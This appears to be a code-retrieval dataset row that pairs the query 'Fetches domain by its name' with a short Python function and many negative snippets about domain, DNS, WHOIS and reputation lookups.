[ "0.65626293", "0.6550737", "0.6313369", "0.6242143", "0.61064005", "0.60898244", "0.6082216", "0.60713875", "0.5890576", "0.5830049", "0.58023095", "0.5726684", "0.5720197", "0.5707687", "0.56511974", "0.5633935", "0.5569308", "0.54979086", "0.5470096", "0.5455716", "0.54556596", "0.54504985", "0.54429936", "0.5403258", "0.53868246", "0.5380584", "0.5375586", "0.5365649", "0.5356054", "0.53555375", "0.53414404", "0.5340507", "0.53388953", "0.53343076", "0.5333159", "0.5332965", "0.5326262", "0.53053963", "0.5302935", "0.5296953", "0.5279093", "0.52626824", "0.5258244", "0.5255544", "0.52489215", "0.5239341", "0.52340084", "0.5229547", "0.5219141", "0.5219117", "0.5212065", "0.5211075", "0.5207885", "0.52035946", "0.51816976", "0.51738405", "0.51700395", "0.51605356", "0.5155824", "0.5149947", "0.51454204", "0.51243305", "0.512115", "0.51186615", "0.51147705", "0.5114194", "0.5112801", "0.5111021", "0.5107446", "0.5103729", "0.5099747", "0.5098742", "0.50954694", "0.5090381", "0.50899386", "0.5087486", "0.5076853", "0.5075803", "0.50680435", "0.5064139", "0.505927", "0.505416", "0.5041739", "0.5034924", "0.5027345", "0.50252676", "0.50229305", "0.5007178", "0.49989936", "0.4998228", "0.4992231", "0.49892554", "0.49887523", "0.4986316", "0.49815673", "0.4981342", "0.49797115", "0.4979382", "0.4977008", "0.4973622" ]
0.62328917
4
Fetches domain by its name
def get_by_name(name):
    return database.get_all(Domain, name, field="name").all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_domain_for_name(self, name):\n domain = self.connection.lookupByName(name)\n return domain", "def lookup(self, domain_name, validate=True):\n try:\n domain = self.get_domain(domain_name, validate)\n except:\n domain = None\n return domain", "def lookup(self, domain_name, validate=True):\r\n try:\r\n domain = self.get_domain(domain_name, validate)\r\n except:\r\n domain = None\r\n return domain", "def get_domain(id):\n return query(WEB_EXAMPLE_BASE + f\"/classical/domain/{id}\")", "def _get_domain(self, name=None, domain_id=None):\n try:\n if name != None:\n domain = self.conn.lookupByName(name)\n elif domain_id != None:\n domain = self.conn.lookupByNamtoprettyxmle(domain_id)\n \n self.logger.debug('Get libvirt domain: %s' % name)\n return domain\n except libvirt.libvirtError, ex:\n self.logger.error(ex)\n raise VirtDomainMonitorError(ex)", "def find_domain(self):\n for network in self.network_set.all():\n if network.site:\n expected_name = \"{0}.{1}.mozilla.com\".format(self.name,\n network.site.get_site_path())\n try:\n domain = Domain.objects.get(name=expected_name)\n except ObjectDoesNotExist, e:\n continue\n return domain.name\n\n return None", "def domain(self, id_or_name):\n return DomainCollection(self.request).find(id_or_name)", "def get(cls, subdomain, name):\n return cls.get_by_key_name(subdomain + ':' + name)", "def __getattr__(self, name):\n if name in self.domains:\n return self.domains[name]\n\n raise AttributeError('No domain named %s found.' % name)", "def get_domain(self, row_id):\n cursor = self.connection.cursor()\n cursor.execute(\"\"\"\n SELECT domain FROM queries WHERE rowid=(?);\n \"\"\", (row_id,))\n return cursor.fetchone()[0]", "def _find_domain(self, domain_name: str) -> digitalocean.Domain:\n\n domain_name_guesses = dns_common.base_domain_name_guesses(domain_name)\n\n domains = self.manager.get_all_domains()\n\n for guess in domain_name_guesses:\n matches = [domain for domain in domains if domain.name == guess]\n\n if matches:\n domain = matches[0]\n logger.debug('Found base domain for %s using name %s', domain_name, guess)\n return domain\n\n raise errors.PluginError(f'Unable to determine base domain for {domain_name} using names: '\n f'{domain_name_guesses}.')", "def get_domain(self, service_name: str) -> str:\n\n # Retrieve Domain URL\n url = 'http://api.liveperson.net/api/account/{}/service/{}/baseURI.json?version=1.0'\n\n # Generate request\n r = requests.get(url=url.format(self.account_id, service_name))\n\n # Check request status\n if r.status_code == requests.codes.ok:\n return r.json()['baseURI']\n else:\n print('Error: {}'.format(r.json()))\n r.raise_for_status()", "def _get_domain(self, doid):\n SQL = render_template(\"/\".join([self.template_path,\n 'get_domain.sql']),\n doid=doid)\n status, res = self.conn.execute_2darray(SQL)\n\n if not status:\n return False, internal_server_error(errormsg=res)\n if len(res['rows']) == 0:\n raise ObjectGone(self.not_found_error_msg('Domain'))\n\n return res['rows'][0]['schema'], res['rows'][0]['domain']", "def _get_domain(self):\n self.ensure_one()\n domain = []\n return domain", "def get_domain(self, rel_name):\n return self._declaration[rel_name].domain_type", "def get_domain(cname = False, subreddit = True, no_www = False):\r\n domain = g.domain\r\n if not no_www and g.domain_prefix:\r\n domain = g.domain_prefix + \".\" + g.domain\r\n if cname and c.cname and c.site.domain:\r\n domain = c.site.domain\r\n if hasattr(request, \"port\") and request.port:\r\n domain += \":\" + str(request.port)\r\n if 
(not c.cname or not cname) and subreddit:\r\n domain += c.site.path.rstrip('/')\r\n return domain", "def get(domain_name=None):\n url = 'https://api.cloudns.net/dns/soa-details.json'\n\n params = Parameters({'domain-name': domain_name})\n\n return requests.get(url, params=params.to_dict())", "def getDomain(self):\n # ui = UrlInfo(url)\n # urlBytes = [ord(i) for i in url]\n host = self.url[self.host_head:self.host_tail]\n domain = self.url[self.domain_head:self.domain_tail]\n\n # domain = url[ui.getDomainHead():ui.getDomainTail()]\n m = re.match(self.ipUrlPattern, host)\n if m:\n domain = m.group(1)\n return domain", "def GetDomain(self, domainName):\n\n response = self.client.http_get(\"/v4/domains/%s\" % domainName)\n\n return parse_response(response, Domain)", "def domain(self):\n return self._get('domain', '/domain/', self.DOMAIN_DATA)", "def get_domain(url, tlds=tlds):\n\n url_elements = url.split('.')\n for i in range(-len(url_elements), 0):\n last_i_elements = url_elements[i:]\n\n candidate = \".\".join(last_i_elements)\n wildcard_candidate = \".\".join([\"*\"] + last_i_elements[1:])\n exception_candidate = \"!\" + candidate\n\n if (exception_candidate in tlds):\n return \".\".join(url_elements[i:]) \n if (candidate in tlds or wildcard_candidate in tlds):\n return \".\".join(url_elements[i-1:])\n\n raise ValueError(\"Domain not in global list of TLDs\")", "def info(self):\n\n return self.call(method='getDomain', args=[self.domainname])", "def getDomain(self, domain=None):\n if domain is None:\n domain = self.domain\n reply = self.rpc.getDomain(self.username,\n self.password,\n domain)\n if not isinstance(reply, dict):\n raise Exception(\"RPC returned error: \" + reply)\n return reply", "def get_domain():\n domain=\"\"\n for item in re.split(\"\\.\", env.host)[1:]:\n domain = domain + \".\" + item\n return domain.lstrip(\".\")", "def get_domain_name(self):\n return self.domain_name.get_text()", "def get_domain_name(self, DomainName: str) -> Dict:\n pass", "async def fetch_subdomain(self, subdomain: str):\n value = await self.http.check_subdomain(subdomain)\n if (value or {}).get('exists') is True:\n # currently this endpoint returns {} if the subdomain does not\n # exist, but just in case it eventually returns 204 or something,\n # we check more explicitly instead.\n if value.get('teamId'):\n using_subdomain = await self.getch_team(value.get('teamId'))\n elif value.get('userId'):\n using_subdomain = await self.getch_user(value.get('userId'))\n\n return using_subdomain\n\n else:\n return None", "def __resolve_domain(self, domain=''):\n _ip = []\n if self.__is_ip_address(domain):\n # print hostname + \" is IP address\"\n _ip.append(domain)\n return _ip\n r = dns.resolver.get_default_resolver()\n r.nameservers = ['8.8.8.8']\n #answers = dns.resolver.query(hostname, 'A')\n try:\n answers = r.query(domain, 'A')\n for rdata in answers:\n # print rdata.address\n _ip.append(rdata.address)\n except dns.resolver.NoAnswer:\n print \"no answer\"\n\n if domain.find(\"www.\") != 0:\n domain = \"www.\" + domain\n # print \"querying \" + hostname\n try:\n answers = dns.resolver.query(domain, 'A')\n for rdata in answers:\n # print rdata.address\n _ip.append(rdata.address)\n except dns.resolver.NoAnswer:\n print \"no answer\"\n # print(\"processed %s, it has %d ips.\" % (hostname, len(_ip)))\n\n return list(set(_ip))", "def domain_lookup(domain):\n # Create the required data dictionary for Host/Reputation\n api_data = {\n 'host': domain\n }\n response = http_request(endpoint=HOST_REPUTE_API, 
data=api_data)\n\n if response.get('errorNo') != 0:\n return_error('API Returned, {}:{}'.format(response.get('errorNo'), response.get('errorMsg')))\n\n return response", "def rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:\n whois = PyWhoIs._rdap_domain_from_url(url, http_client)\n return whois", "def get_domain(self, domain=None):\n _log.debug(\"get_domain\")\n try:\n _ca_conf = _conf.get(\"security\", \"certificate_authority\")\n if \"domain_name\" in _ca_conf:\n return _ca_conf[\"domain_name\"]\n except Exception as err:\n _log.debug(\"get_domain: err={}\".format(err))\n _log.debug(\"get_domain: Could not read security domain from config. [Security not enabled]\") \n _log.debug(\"get_domain: Domain not found in Calvin config, let's use supplied domain\")\n if domain:\n return domain\n else:\n raise Exception(\"get_domain: Domain not set anywhere\")", "async def aio_rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:\n whois = await PyWhoIs._aio_rdap_domain_from_url(url, http_client)\n return whois", "def get_domain(self) -> Domain:\n domain = Domain.empty()\n\n # If domain path is None, return an empty domain\n if not self._domain_path:\n return domain\n try:\n domain = Domain.load(self._domain_path)\n except InvalidDomain as e:\n rasa.shared.utils.io.raise_warning(\n f\"Loading domain from '{self._domain_path}' failed. Using \"\n f\"empty domain. Error: '{e}'\"\n )\n\n return domain", "def ask_for_domain():\n found = False\n\n # Keep asking until a valid domain has been entered by the user\n while not found:\n domain = u\"https://\" + input(u\"\\nEnter the Canvas domain of your institution:\\n$ https://\")\n found = helpers.validate_domain(domain)\n\n return domain", "def domain(s):\r\n res = r_domain.findall(s)\r\n domain = (res and res[0]) or s\r\n return domain.lower()", "def get(\n server_context: ServerContext, schema_name: str, query_name: str, container_path: str = None\n) -> Domain:\n url = server_context.build_url(\"property\", \"getDomain.api\", container_path=container_path)\n payload = {\"schemaName\": schema_name, \"queryName\": query_name}\n raw_domain = server_context.make_request(url, payload, method=\"GET\")\n\n if raw_domain is not None:\n return Domain(**raw_domain)\n\n return None", "def _get_domain_for_uuid(self, uuid):\n domain = self.connection.lookupByUUIDString(uuid)\n return domain", "def get_domain(self, response):\n parts = urllib.parse.urlparse(response.url)\n domain = parts.netloc\n return domain", "def get_domain(self):\n return self.domain", "def _get_domain_from_certificate_name(self, cert_name):\n # Remove Let's Encrypt prefix\n cert_name = cert_name.lstrip('le-')\n\n # Remove trailing numbers if present (as last 10 characters)\n name_fragments = cert_name.split('-')\n if len(name_fragments) > 1 and name_fragments[-1].isdigit():\n name_fragments = name_fragments[:-1]\n return '-'.join(name_fragments)", "def domain(self):\n return get_tld(self.url, fail_silently=True)", "def url_get_domain(url):\n\n url_tuple = urlparse.urlparse(url)\n return url_tuple[1]", "async def _async_query_domain() -> Domain | None:\n try:\n return await hass.async_add_executor_job(\n whois_query, entry.data[CONF_DOMAIN]\n )\n except UnknownTld as ex:\n raise UpdateFailed(\"Could not set up whois, TLD is unknown\") from ex\n except (FailedParsingWhoisOutput, WhoisCommandFailed, UnknownDateFormat) as ex:\n raise UpdateFailed(\"An error occurred during WHOIS lookup\") from ex", "def select_domain_by_id(conn, domainid):\n # open a 
cursor\n cur = conn.cursor()\n # sql\n sql = \"select * from domain where domainid > ?\"\n # execute the sql with bind parameters\n cur.execute(sql, (domainid,))\n # result of the query. The result is a list of rows\n # example [(1, 'domain1', 'daily'), (2, 'domain2', 'daily')]\n rows = cur.fetchall()\n return rows", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def parse_domain(url):\n domain_match = lib.DOMAIN_REGEX.match(url)\n if domain_match:\n return domain_match.group()", "def get_domain_of_page(page_url):\r\n db = connect()\r\n cursor = db.cursor()\r\n sql_statement = \"\"\"\r\n SELECT on_progress_domains.url\r\n FROM on_progress_pages INNER JOIN on_progress_domains ON on_progress_pages.domain_id = on_progress_domains.domain_id\r\n WHERE on_progress_pages.page_url = %(d)s\r\n \"\"\"\r\n try:\r\n cursor.execute(sql_statement, {'d':page_url})\r\n page = cursor.fetchone()\r\n except:\r\n cursor.close()\r\n db.close()\r\n raise RuntimeError(\"An Exception happened with the Database, make sure you are connected\")\r\n cursor.close()\r\n db.close()\r\n return page", "def get_domain(self):\n return self._domain", "def get_domain(url):\n a = urllib.parse.urlsplit(url)\n return str(a.scheme) + \"://\" + str(a.hostname)", "def domain(self):\n return self['domain']", "def get_domain_name(url):\n try:\n results = get_sub_domain_name(url).split('.')\n return results[-2] + '.' + results[-1]\n except:\n return ''", "def get_domain_id_by_domainurl(domain_url):\r\n db = connect()\r\n cursor = db.cursor()\r\n sql_statement = \"\"\"\r\n SELECT domain_id FROM `domains` WHERE domain_url = %(d)s\r\n \"\"\"\r\n try:\r\n cursor.execute(sql_statement, {'d':domain_url})\r\n page = cursor.fetchone()\r\n except:\r\n cursor.close()\r\n db.close()\r\n raise RuntimeError(\"An Exception happened with the Database, make sure you are connected\")\r\n cursor.close()\r\n db.close()\r\n return page", "def get_site(name):\n return sites[name]", "def resolve_domain(host: str) -> str:\n parts = host.split('.')[-2:]\n return ''.join(parts)", "def domain(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"domain\")", "def GetDomainName(self):\n try:\n return self.server.GetDomainName()\n except dbus.DBusException:\n return None", "def getDomain(self):\n return self.domain", "def get_domains(filename):\n with open(filename, 'r') as file:\n result = []\n for line in file.readlines():\n domain = line.strip()[1:]\n result.append(domain)\n return result", "def domain_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_name\")", "def domain(url):\n if isinstance(url, str):\n domain_match = re.match(r'https?://(?:www\\.)?([^/]+)\\.[^/]+', url)\n return domain_match.group(1) if domain_match else ''\n else:\n raise ParseError('Invalid input for domain(): {}'.format(url))", "def get_concept_by_domain(self, domain_simple_name):\n res = self.db.engine.execute(GET_CONCEPT_OCCURRENCES.format(domain_simple_name)).fetchone()\n return res[0]", "def list_domain_names():\n pass", "def get_domain(self, axis_id):\n if axis_id in self.axes_domains:\n return self.axes_domains[axis_id]\n else:\n raise Exception('Unknow axis %s' % axis_id)", "def create_or_show_domain(name):\n manager = get_manager()\n domain_id = manager.resolve_domain_id(name)\n if domain_id:\n log(\"Domain '%s' already exists.\" % name, level=DEBUG)\n else:\n manager.create_domain(domain_name=name,\n description='Created by Juju')\n 
log(\"Created new domain: %s\" % name, level=DEBUG)\n domain_id = manager.resolve_domain_id(name)\n return domain_id", "def get_domain(self, email):\r\n try:\r\n return str(email).split('r@')[1]\r\n except:\r\n return None", "def filter_domain(name):\n def wrapped(request):\n \"\"\" Function used to filter request\n \"\"\"\n if request.environ.get('HTTP_HOST'):\n url = request.environ['HTTP_HOST']\n else:\n url = request.environ['SERVER_NAME']\n if url.lower() == name.lower():\n return True\n\n return False\n return wrapped", "def domain_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"domain_name\")", "def cloudfront_public_lookup(session, hostname):\n if session is None:\n return None\n\n client = session.client('cloudfront')\n response = client.list_distributions(\n MaxItems='100'\n )\n items = response[\"DistributionList\"][\"Items\"]\n for item in items:\n cloud_front_domain_name = item[\"DomainName\"]\n if item[\"Aliases\"][\"Quantity\"] > 0:\n if hostname in item[\"Aliases\"][\"Items\"]:\n return cloud_front_domain_name\n return None", "def getDomains(self, company):\n return self.db.getDomains(company)", "def _get_domain_for_node(self, node):\n domain = self.connection.lookupByUUIDString(node.uuid)\n return domain", "def get_possible_domain(self):\n return self.possible_domain", "def get_domain_of_url(url):\n try:\n request = Request(url)\n request.add_header('User-Agent', 'Resistance is futile')\n response = urlopen(request)\n response_url = response.url\n domain = urlparse(response_url).hostname\n return domain.lower()\n except:\n return \"URL_ERROR\"", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def get_service_by_domain_name(self, domain_name):\n try:\n service_details = self.storage_controller\\\n .get_service_details_by_domain_name(domain_name)\n if service_details is None:\n # as per latest change, get_service_details_by_domain_name\n # will return None if the service_details can not be found\n # for this domain\n raise LookupError\n except Exception:\n raise LookupError(u'Domain {0} does not exist'.format(\n domain_name))\n return service_details", "def getDomain(url):\n domain = string.replace(url,\"https://www.\",\"\")\n domain = string.replace(domain,\"http://www.\",\"\")\n domain = string.replace(domain,\"http://\",\"\")\n domain = string.replace(domain,\".com/\",\"\")\n domain = string.replace(domain,\".com\",\"\")\n return domain", "def domain(self) -> str:\n return pulumi.get(self, \"domain\")", "def domain(self) -> str:\n return pulumi.get(self, \"domain\")", "def get_domain_config():\n query = {\n \"type\": \"config\",\n \"action\": \"get\",\n \"xpath\": \"/config/devices/entry[@name='localhost.localdomain']/deviceconfig/system/domain\",\n }\n\n return __proxy__[\"panos.call\"](query)", "def get_company(self, name):\n return self.website.company.id", "def get_keystone_v3_domain_id(self, domain_name):\n LOG_OBJ.debug(\"Get the domain ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains?name=\" + \\\n str(domain_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = 
None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of domain\")\n print (\"No response from Server while getting the \"\n \"ID of domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get domain ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get domain ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n if len(output['domains']) != 1:\n LOG_OBJ.debug(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n print(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n return\n\n return output['domains'][0]['id']", "def _get_cookie(self, name, domain):\n for cookie in self._cookiejar:\n if cookie.name == name and cookie.domain == domain:\n if cookie.is_expired():\n break\n return cookie", "def domain(cls) -> str:\n return f'{cls.name}.wikimedia.org'", "def getDomain(self, *args, **kwargs):\n\n return_json = dict()\n jdatas = list()\n try:\n result, name = is_file(kwargs.get('value')[0])\n if result:\n jdatas = [load_file(name)]\n kwargs['dump'] = False\n md5_hash = ''\n\n except IndexError:\n print('[-] Something going wrong')\n return\n\n if not jdatas:\n if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1 and \\\n os.path.exists(kwargs.get(\"value\")[0]) and kwargs.get(\"value\")[0].endswith(\".txt\"):\n kwargs[\"value\"] = [domain.strip() for domain in open(kwargs.get(\"value\")[0], \"rb\").readlines()]\n elif isinstance(kwargs.get('value'), six.string_types):\n kwargs['value'] = [kwargs.get('value')]\n\n kwargs['value'] = [urlparse(domain).netloc.lower() if domain.startswith(('http://', 'https://')) else domain for domain in kwargs.get('value')]\n\n url = self.base.format('domains/')\n\n for domain in kwargs.get('value'):\n url = self.base.format('domains/{}'.format(domain))\n if kwargs.get('domain_post_comments'):\n url += '/comments'\n method = 'post'\n data = '{\"data\": {\"type\": \"comment\", \"attributes\": {\"text\": \"Lorem ipsum dolor sit ...\"}}}'\n elif kwargs.get('domain_get_comments'):\n url += '/comments'\n method = 'get'\n else:\n #url += '/' + kwargs['domain_get_relationships']\n self.params[\"relationships\"] = 'communicating_files,downloaded_files,graphs,referrer_files,resolutions,siblings,subdomains,urls'\n method = \"get\"\n jdata, response = get_response(url, apikey=self.apikey, method=method, params=self.params)\n jdatas.append((domain, jdata))\n\n if kwargs.get('return_raw'):\n return jdatas\n\n for domain, jdata in jdatas:\n if jdata.get('data'):\n jdata = jdata['data']\n\n if not (kwargs.get('return_json') or kwargs.get('return_raw')) and kwargs.get('verbose'):\n print('\\n[+] Domain:', domain)\n\n single_dict = (\n 'TrendMicro category',\n 'Dr.Web category',\n 'BitDefender category',\n 'Websense ThreatSeeker category',\n 'Alexa category',\n 'Alexa domain info',\n 'Alexa rank',\n 'Opera domain info',\n 'subdomains',\n 'siblings',\n )\n\n complicated_dict = (\n 'WOT domain info',\n 'Webutation domain info',\n )\n\n for key in single_dict:\n if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key: jdata[key]})\n else:\n self.print_key(key)\n if 
isinstance(jdata[key], list):\n print('\\t', '\\n\\t'.join(jdata[key]))\n else:\n print('\\t{0}'.format(jdata[key]))\n\n for key in complicated_dict:\n if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key: jdata[key]})\n else:\n self.__print_complex_dict(jdata, key, kwargs)\n\n if jdata['attributes'].get('whois') and ((kwargs.get('whois') or 'whois' in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({'whois': jdata['attributes']['whois']})\n else:\n print('\\n[+] Whois data:\\n')\n try:\n print('\\t', jdata['attributes']['whois'].replace('\\n', '\\n\\t'))\n except:\n try:\n print('\\t', jdata['attributes']['whois'].encode('utf-8', 'replace').replace('\\n', '\\n\\t'))\n except:\n print('Old version of python has some problems with converting chars to ansii')\n\n self._print_complex_dict(jdata['attributes'], 'categories')\n self.__parse_relationships(jdata['relationships'], domain)\n if kwargs.get(\"domain_get_comments\", False) is True:\n simple_list = (\n \"date\",\n \"tags\",\n \"text\",\n \"votes\",\n \"links\"\n )\n for block in jdata:\n print(\"[+] Comment ID: {}\".format(block[\"id\"]))\n for key in simple_list:\n if block.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key: block[\"attributes\"][key]})\n else:\n self.print_key(key, indent='', separator='\\t[+]')\n if key == \"date\":\n print('\\t', datetime_from_timestamp(block.get(key)))\n else:\n print('\\t', block.get(key))\n\n # ToDo\n #elif kwargs.get(\"post_post_comments\", False) is True:\n\n elif kwargs.get('domain_get_relationships', False):\n self._print_complex_dict(jdata['attributes'], 'categories')\n self.__parse_relationships(jdata['relationships'], domain)\n \"\"\"\n simple_list = (\n \"url\",\n \"last_final_url\",\n \"tags\",\n \"total_votes\",\n \"last_analysis_date\",\n \"last_analysis_stats\",\n )\n for block in jdata['attributes']:\n print(block)\n for key in simple_list:\n if block.get(key, \"\") and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key:block[key]})\n else:\n self.print_key(key, indent='', separator='\\t[+]')\n if key == \"last_analysis_date\":\n print('\\t', datetime_from_timestamp(block.get(key)))\n else:\n print('\\t', block.get(key))\n #[{u'attributes': {u'total_votes': {u'harmless': 0, u'malicious': 0}, u'last_final_url': u'https://msg3.club/', u'tags': [], u'url': u'https://msg3.club/', u'last_analysis_date': 1551639858, u'last_analysis_stats': {u'harmless': 57, u'malicious': 1, u'suspicious': 0, u'undetected': 8, u'timeout': 0}, u'first_submission_date': 1551639858,\n self.last_analysis_results(block, args, kwargs)\n \"\"\"\n\n if kwargs.get('return_json'):\n return_json.update(self.__detected_samples(jdata, *args, **kwargs))\n else:\n return_json = self.__detected_samples(jdata, *args, **kwargs)\n\n if jdata.get('pcaps') and ((kwargs.get('pcaps') or 'pcaps' in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({'pcaps': jdata['pcaps']})\n else:\n print('\\n')\n pretty_print(jdata['pcaps'], ['pcaps'], [70], ['c'], kwargs.get('email_template'))\n\n if jdata.get('resolutions') and ((kwargs.get('resolutions') or 'resolutions' in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({'passive_dns': jdata['resolutions']['data']})\n else:\n print('\\n[+] Passive 
DNS replication\\n')\n pretty_print(jdata['resolutions']['data'],\n ['ip_address', 'type'],\n [25, 20],\n ['c', 'c'],\n kwargs.get('email_template')\n )\n\n if kwargs.get('walk') and jdata.get('resolutions', {}).get(\"data\", []):\n filter_ip = list()\n for ip in jdata['resolutions']['data']:\n ip = ip['id'].replace(domain, '')\n if ip not in filter_ip:\n print('\\n\\n[+] Checking data for ip: {0}'.format(ip))\n kwargs['value'] = ip\n self.getIP(**kwargs)\n\n if kwargs.get('dump') is True:\n md5_hash = hashlib.md5(name.encode(\"utf-8\")).hexdigest()\n jsondump(jdata, md5_hash)\n\n if kwargs.get('return_json'):\n return return_json", "def bucket_domain_name(self) -> typing.Optional[str]:\n return self._values.get('bucket_domain_name')", "def test_get_a_domain(self):\n\n self.assertIn('tld', self.powerglove.domains)\n self.assertIn('stable.tld', self.powerglove.domains)\n self.assertIn('super.stable.tld', self.powerglove.domains)\n\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.great.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.stable.great.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.stable.tld').name, \"stable.tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.very.stable.tld').name, \"stable.tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.stable.tld').name, \"super.stable.tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.very.super.stable.tld').name, \"super.stable.tld\")\n\n with self.assertRaises(PowergloveError):\n self.powerglove.get_a_domain_from_fqdn('host.unknowntld')", "def test_client_get_domain(mocker, client_domain_input):\n mocker.patch(\"tracker_client.client.get_auth_token\")\n mocker.patch(\"tracker_client.client.create_client\")\n test_client = Client()\n test_client.execute_query = mocker.MagicMock(return_value=client_domain_input)\n\n domain = test_client.get_domain(\"foo.bar\")\n\n test_client.execute_query.assert_called_once_with(\n queries.GET_DOMAIN, {\"domain\": \"foo.bar\"}\n )\n assert domain.domain_name == \"foo.bar\"\n assert domain.dmarc_phase == \"not implemented\"\n assert domain.last_ran == \"2021-01-27 23:24:26.911236\"\n assert domain.dkim_selectors == []", "def domain(self, domain):", "def get_domain_of_problem(problem_string):\n for line in problem_string.splitlines():\n # Skip empty lines.\n if re.match(r'^\\s*$', line):\n continue\n match = re.search('\\(:domain ([^)]+)\\)', line)\n if match:\n break\n assert match is not None, \\\n 'Could not extract domain name from ' \\\n 'first non-empty line \"{}\".'.format(line)\n return match.group(1)", "def check_domain_exists(domain):\r\n try:\r\n return socket.gethostbyname(domain)\r\n except socket.gaierror as exception:\r\n if exception.errno == -2:\r\n raise Exception('Unknown domain name: {}'.format(domain))\r\n else:\r\n raise", "def get_domain_from_path(post_path):\n return post_path.split('/', 1)[0]", "def domain_command():\n # 1. Get input host from Demisto\n domain = demisto.args().get('domain')\n # 2. Get the host reputation from SlashNext API\n response = domain_lookup(domain=domain)\n if response.get('errorNo') != 0:\n return\n # 3. 
Parse and format the response\n dbot_score_cont, domain_cont = get_dbot_std_context(\n domain, 'Domain', response.get('threatData').get('verdict'), response.get('threatData').get('threatType'))\n\n snx_ioc_cont = get_snx_host_ioc_context(domain, 'Domain', response.get('threatData'))\n\n ec = {\n 'SlashNext.Domain(val.Value === obj.Value)': snx_ioc_cont,\n 'DBotScore': dbot_score_cont,\n 'Domain': domain_cont\n }\n\n domain = domain.encode('idna')\n\n title = 'SlashNext Phishing Incident Response - Domain Lookup\\n' \\\n '##### domain = {}'.format(domain.decode())\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['Value',\n 'Type',\n 'Verdict',\n 'ThreatStatus',\n 'ThreatName',\n 'ThreatType',\n 'FirstSeen',\n 'LastSeen']\n )\n\n return_outputs(md, ec, snx_ioc_cont)", "def domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain\")", "def domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain\")", "def domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain\")", "def get_domains(self):\n\n response = self.call(method='getDomains')\n domains = []\n for d in response:\n domain = self.domain(domain=d['domain'])\n domains.append(domain)\n return domains" ]
[ "0.82388127", "0.7296342", "0.72872925", "0.71128905", "0.70768034", "0.7075855", "0.70597684", "0.69037956", "0.68828833", "0.6841402", "0.6727464", "0.65337366", "0.64684", "0.6401447", "0.63366103", "0.63004", "0.6292597", "0.62468135", "0.62434566", "0.62265456", "0.61929935", "0.6146508", "0.61198103", "0.6104366", "0.605911", "0.60484904", "0.60445577", "0.5989959", "0.59823364", "0.5974699", "0.5966888", "0.5927165", "0.5925513", "0.59150296", "0.591246", "0.59031725", "0.58928514", "0.5843648", "0.58194953", "0.58120215", "0.57978296", "0.57941365", "0.57804567", "0.5747359", "0.57413656", "0.57413656", "0.57380927", "0.57334787", "0.5730023", "0.5727436", "0.5725671", "0.5710491", "0.571049", "0.57054573", "0.56923956", "0.5688056", "0.5662557", "0.56622577", "0.5657124", "0.5644354", "0.56347644", "0.56150514", "0.5614598", "0.56019515", "0.5598817", "0.559386", "0.55858463", "0.55766326", "0.55766326", "0.55766326", "0.5573051", "0.5568764", "0.5562225", "0.5550071", "0.55496323", "0.5548903", "0.5548903", "0.5548903", "0.5548618", "0.55449146", "0.5543532", "0.5543532", "0.5534954", "0.55213004", "0.5519931", "0.5500839", "0.54964167", "0.5493008", "0.5488499", "0.54859674", "0.54846203", "0.54724854", "0.54690444", "0.5465723", "0.5460058", "0.5455842", "0.5455404", "0.5455404", "0.5455404", "0.54463786" ]
0.654201
11
Return True if domain is marked sensitive
def is_domain_sensitive(name):
    query = database.session_query(Domain)
